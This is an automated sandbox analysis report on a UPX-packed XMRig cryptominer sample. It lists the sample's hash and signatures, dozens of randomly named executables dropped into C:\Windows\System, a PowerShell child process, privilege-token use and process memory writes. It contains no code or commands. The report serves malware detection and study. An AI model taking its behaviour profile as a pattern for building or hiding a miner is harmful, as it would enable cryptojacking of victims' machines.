Malware Analysis Report

2025-04-19 16:10

Sample ID 240522-wlzj7sbb87
Target 681fa5f55149496faf3c4088aa79b007_JaffaCakes118
SHA256 d4e4298e748d74336d3e439dbe17087388e6104075dc310e8600551093a8ae1b
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d4e4298e748d74336d3e439dbe17087388e6104075dc310e8600551093a8ae1b

Threat Level: Known bad

The file 681fa5f55149496faf3c4088aa79b007_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 18:01

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 18:01

Reported

2024-05-22 18:03

Platform

win7-20240419-en

Max time kernel

149s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\xckLZbw.exe N/A
N/A N/A C:\Windows\System\nEmipTm.exe N/A
N/A N/A C:\Windows\System\EhsFdXx.exe N/A
N/A N/A C:\Windows\System\DGpoDKQ.exe N/A
N/A N/A C:\Windows\System\DvvkNjE.exe N/A
N/A N/A C:\Windows\System\iRJBSpE.exe N/A
N/A N/A C:\Windows\System\SoDOqkX.exe N/A
N/A N/A C:\Windows\System\FGRYSFW.exe N/A
N/A N/A C:\Windows\System\EobvnCR.exe N/A
N/A N/A C:\Windows\System\bmcyMQk.exe N/A
N/A N/A C:\Windows\System\uLPtcli.exe N/A
N/A N/A C:\Windows\System\eGygMIh.exe N/A
N/A N/A C:\Windows\System\vJmUynQ.exe N/A
N/A N/A C:\Windows\System\PlitksV.exe N/A
N/A N/A C:\Windows\System\FEiUQlh.exe N/A
N/A N/A C:\Windows\System\bNxsgUL.exe N/A
N/A N/A C:\Windows\System\fXJHDAR.exe N/A
N/A N/A C:\Windows\System\eKTDLTy.exe N/A
N/A N/A C:\Windows\System\MKwCmnV.exe N/A
N/A N/A C:\Windows\System\OXnQvGR.exe N/A
N/A N/A C:\Windows\System\JldVunT.exe N/A
N/A N/A C:\Windows\System\BUYmGID.exe N/A
N/A N/A C:\Windows\System\TAbcggi.exe N/A
N/A N/A C:\Windows\System\OpkkRaP.exe N/A
N/A N/A C:\Windows\System\HNCQdKv.exe N/A
N/A N/A C:\Windows\System\hnaNkWZ.exe N/A
N/A N/A C:\Windows\System\PHdVjoa.exe N/A
N/A N/A C:\Windows\System\mCFgOYK.exe N/A
N/A N/A C:\Windows\System\buNRcRi.exe N/A
N/A N/A C:\Windows\System\WAAuQix.exe N/A
N/A N/A C:\Windows\System\zrScSgw.exe N/A
N/A N/A C:\Windows\System\tvnfEeT.exe N/A
N/A N/A C:\Windows\System\LgVkKvI.exe N/A
N/A N/A C:\Windows\System\ecRXgKg.exe N/A
N/A N/A C:\Windows\System\lvZPCeb.exe N/A
N/A N/A C:\Windows\System\hGzPJeV.exe N/A
N/A N/A C:\Windows\System\pcHTAxN.exe N/A
N/A N/A C:\Windows\System\zSYjFzB.exe N/A
N/A N/A C:\Windows\System\tZPZFQH.exe N/A
N/A N/A C:\Windows\System\zKveasS.exe N/A
N/A N/A C:\Windows\System\YRHWGSS.exe N/A
N/A N/A C:\Windows\System\WzJlRho.exe N/A
N/A N/A C:\Windows\System\jyEttXa.exe N/A
N/A N/A C:\Windows\System\dHxCoWn.exe N/A
N/A N/A C:\Windows\System\TPPfhhc.exe N/A
N/A N/A C:\Windows\System\Tskgctb.exe N/A
N/A N/A C:\Windows\System\uIdwHlS.exe N/A
N/A N/A C:\Windows\System\EPXLcwZ.exe N/A
N/A N/A C:\Windows\System\vlsXMbn.exe N/A
N/A N/A C:\Windows\System\yImJVFn.exe N/A
N/A N/A C:\Windows\System\QoFaNoP.exe N/A
N/A N/A C:\Windows\System\msgQoFB.exe N/A
N/A N/A C:\Windows\System\GYVqMAW.exe N/A
N/A N/A C:\Windows\System\sHTQcBQ.exe N/A
N/A N/A C:\Windows\System\Snlwoaz.exe N/A
N/A N/A C:\Windows\System\HSoqSdf.exe N/A
N/A N/A C:\Windows\System\dKImfgh.exe N/A
N/A N/A C:\Windows\System\IGcKIEu.exe N/A
N/A N/A C:\Windows\System\RjZBOOD.exe N/A
N/A N/A C:\Windows\System\wiiIdWq.exe N/A
N/A N/A C:\Windows\System\tOvLGeh.exe N/A
N/A N/A C:\Windows\System\AxjGAeZ.exe N/A
N/A N/A C:\Windows\System\AQqdThW.exe N/A
N/A N/A C:\Windows\System\XkHLlAX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ncXZZBA.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\LvFgtFz.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\TMQFcvz.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XMnLRvm.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\sasjlZA.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\znIImlN.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\aBjfbcn.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\NISsOfj.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\jSVxFVH.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\zbGrnMv.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ozxLVlb.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\IwoJRHc.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\LtTxAXP.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\gxQigxt.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\muflrPM.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\dbZoJZf.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\eXFNzRO.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ywOekai.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\bjjsOPG.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\xvLfHuH.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\LkvGobk.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\pLZkLHh.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\tFQYjWz.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\iSvVURE.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\EKiNzyo.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ompSLhe.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\SnSIPDd.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\frdpPOI.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\bItAJkY.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XdiVoLE.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XuQTaXy.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ppWcAVF.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\iTzHnjF.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\nPDIEwM.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\xRfMyiw.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\KoJIuAk.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\voPNqlr.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\InJxZZI.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\HSsevJl.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\AGSObOL.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\Rpeqzpa.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\aiFIyKW.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\EVvfkmv.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ZdHKRMl.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\kvdyIQW.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\Urceubv.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\lyeOnfM.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\WxpIsDN.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\FcMlJdd.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\xJUtkOI.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\PBxNbXf.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\AspppKH.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ngVYkFR.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\MKCVkCi.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\MKqmfYH.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ZLorMab.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\NuXvIyx.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\gBUjude.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\HqHzpGO.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\oBvOIXD.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\dCOswVE.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\vqzUasI.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\DuCAIuJ.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\rMtsXRU.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\xckLZbw.exe
PID 1740 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\xckLZbw.exe
PID 1740 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\xckLZbw.exe
PID 1740 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\EhsFdXx.exe
PID 1740 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\EhsFdXx.exe
PID 1740 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\EhsFdXx.exe
PID 1740 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\nEmipTm.exe
PID 1740 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\nEmipTm.exe
PID 1740 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\nEmipTm.exe
PID 1740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\DGpoDKQ.exe
PID 1740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\DGpoDKQ.exe
PID 1740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\DGpoDKQ.exe
PID 1740 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\DvvkNjE.exe
PID 1740 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\DvvkNjE.exe
PID 1740 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\DvvkNjE.exe
PID 1740 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\iRJBSpE.exe
